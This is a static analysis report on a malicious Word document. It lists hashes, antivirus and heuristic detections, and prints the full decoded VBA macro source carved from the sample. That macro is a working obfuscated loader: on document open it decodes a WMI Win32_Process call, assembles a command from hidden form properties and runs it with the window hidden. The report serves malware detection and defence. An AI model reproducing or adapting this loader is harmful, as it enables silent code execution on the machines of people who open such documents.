Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 8e9d6ebfc1fd69a2…

MALICIOUS

Office (OLE) / .DOC

175.5 KB Created: 2020-08-22 05:01:00 Authoring application: Microsoft Office Word First seen: 2026-06-17
MD5: c9384d7754ef88228fb61f67c598bed1 SHA-1: ba0caf5415feb9aa061caa90b6090c1c60b0b26b SHA-256: 8e9d6ebfc1fd69a2df5c0688489b12c4cff6ca6534a9a54dd504439071209734
230 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Generic-9443669-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-9443669-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Gbn0eq_s1_j = Split _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set P_fw0mv2yd10 = CreateObject(S7l7nx5ys3ewqfbpqq)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10212 bytes
SHA-256: 3deb0690cea8bbe223c6bb4e009d6dba41baeb01c72dea50af699d9370ffa5ec
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Jlowf8dwgkuu9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
N6yhc60tpif3av3.G8ckn1_ynwje
End Sub


Attribute VB_Name = "N6yhc60tpif3av3"
Attribute VB_Base = "0{6C3E871F-38B0-4AD5-AD34-9AB8C762A84E}{B493A0CB-2283-4FED-9888-31E00276724D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function G8ckn1_ynwje()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Yldxehrsmq8 = N6yhc60tpif3av3.BorderStyle + 100
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
U9x98mqrmtrjf1xvx = ChrW(Yldxehrsmq8 + (15))
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Nb869ttdha_th = "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]i15df qhs1g 2[s55da znb183b]nm15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]gm15df qhs1g 2[s55da znb183b]t15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]" + U9x98mqrmtrjf1xvx + "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]:15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]in15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]315df qhs1g 2[s55da znb183b]215df qhs1g 2[s55da znb183b]_15df qhs1g 2[s55da znb183b]" + N6yhc60tpif3av3.W0ve0gyyqng + "15df qhs1g 2[s55da znb183b]ro15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]ce15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]"
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
S7l7nx5ys3ewqfbpqq = Iu2754usl_7i(Nb869ttdha_th)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set P_fw0mv2yd10 = CreateObject(S7l7nx5ys3ewqfbpqq)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Z_8lva3zukndfi4 = N6yhc60tpif3av3.X_e_6vag4hceo.ControlTipText
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Qcxj6b7sfu9_z = H8omhzh5k3vyn5nnq + (S7l7nx5ys3ewqfbpqq + U9x98mqrmtrjf1xvx + N6yhc60tpif3av3.V25hagsfcrg0xg.ControlTipText + Z_8lva3zukndfi4)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Vhvplmhl7f0epe = Qcxj6b7sfu9_z + N6yhc60tpif3av3.W0ve0gyyqng
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set Ut00f0vi7vuv64d = V0kppmyn9s42z_eq(Vhvplmhl7f0epe)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Pjg768ctdny3_o = Array(Ez1izc4ciquli9 + "Og2zuiwocsk P6ft4gkgfxf2o4h9Hv6wb4sak5gvkx Kohhd92f9399b_l2", P_fw0mv2yd10.Create(N3y0qafq8lxrgzcr, R038qcubyss, Ut00f0vi7vuv64d), Dw6_omaw_6tuq + "Vd7qb_df8l750myfpp V5fc9xxlfa5q Muiqghrtj01u Ooy95pdlxcz")
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function V0kppmyn9s42z_eq(Aki1vbyg91o)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set V0kppmyn9s42z_eq = CreateObject(Aki1vbyg91o)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
V0kppmyn9s42z_eq.showwindow = Y4oz9ec7ynp + G_h01u6qt4c
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function Iu2754usl_7i(Sw5_2mcvub49)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
N_b0owfw3wdoftjcu = Trim(Conversion.CVar((Sw5_2mcvub49)))
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Gbn0eq_s1_j = Split _
(N_b0owfw3wdoftjcu, "15d" + "f qhs" + "1g 2[s55" + "da znb" + "183b]")
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Qirwj3f_53uatijr2y = Qigom96ruohpd + Join(Gbn0eq_s1_j, I5xyri0uz6ifvciit)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Iu2754usl_7i = Qirwj3f_53uatijr2y
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function N3y0qafq8lxrgzcr()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
N3beqaaluk5l = N6yhc60tpif3av3.Co85rnvxwegz.Tag
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
N3y0qafq8lxrgzcr = Iu2754usl_7i(N3beqaaluk5l)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function